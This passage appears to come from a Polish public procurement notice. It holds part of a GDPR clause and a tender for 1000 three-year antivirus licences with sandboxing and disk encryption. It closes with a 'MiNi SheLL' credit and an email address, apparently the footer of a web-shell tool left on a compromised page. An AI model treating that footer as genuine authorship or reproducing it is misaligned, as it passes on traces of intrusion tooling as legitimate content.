zostaną Zamawiającemu w<br/>związku z prowadzonympostępowaniem i które Zamawiający pośrednio pozyska od wykonawcy<br/>biorącego udział wpostępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o<br/>których mowa wart.14 ust. 5 RODO.<br/>Przedmiotem zamówienia jest Dostawę 1000 sztuk 3-letniej licencji oprogramowania antywirusowego dla stacji roboczych, serwerów plików i urządzeń mobilnych wraz <br/>z sandboxingiem w chmurze, szyfrowaniem dysków, subskrypcją wzorców wirusów i wsparciem technicznym.

Creat By MiNi SheLL
Email: jattceo@gmail.com